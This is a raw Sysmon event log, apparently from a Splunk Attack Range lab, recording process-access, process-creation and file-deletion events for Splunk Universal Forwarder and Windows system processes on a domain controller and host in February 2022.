10341000x8000000000000000295753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:19.248{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-15A3-6216-D306-000000003802}5188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:19.248{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-15A3-6216-D306-000000003802}5188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:19.249{C8EA50B7-15A3-6216-D306-000000003802}5188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000295778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.782{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-15A4-6216-D506-000000003802}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.782{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.782{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.782{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.782{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.782{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-15A4-6216-D506-000000003802}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.782{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-15A4-6216-D506-000000003802}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.783{C8EA50B7-15A4-6216-D506-000000003802}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.451{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1094FEC8332024C51865DB3E6C3D1961,SHA256=98B0D60186F8DF91D440EF2E04339BDC55806CB50379E64CBEE0B5964CA54435,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219913Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:20.379{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AD0DE1713EA84E5C6B3979926519D73,SHA256=89506D411B9E91707CB70E2A5FBE4BF3EFFD2C6761C2752B9D03E838B2FA8610,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.398{C8EA50B7-15A4-6216-D406-000000003802}67165132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.114{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-15A4-6216-D406-000000003802}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.114{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.114{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.114{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-15A4-6216-D406-000000003802}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.114{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.114{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.114{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-15A4-6216-D406-000000003802}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:20.115{C8EA50B7-15A4-6216-D406-000000003802}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000295789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:21.668{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-15A5-6216-D606-000000003802}7108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:21.668{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:21.668{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:21.668{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:21.668{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:21.668{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-15A5-6216-D606-000000003802}7108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:21.668{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-15A5-6216-D606-000000003802}7108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 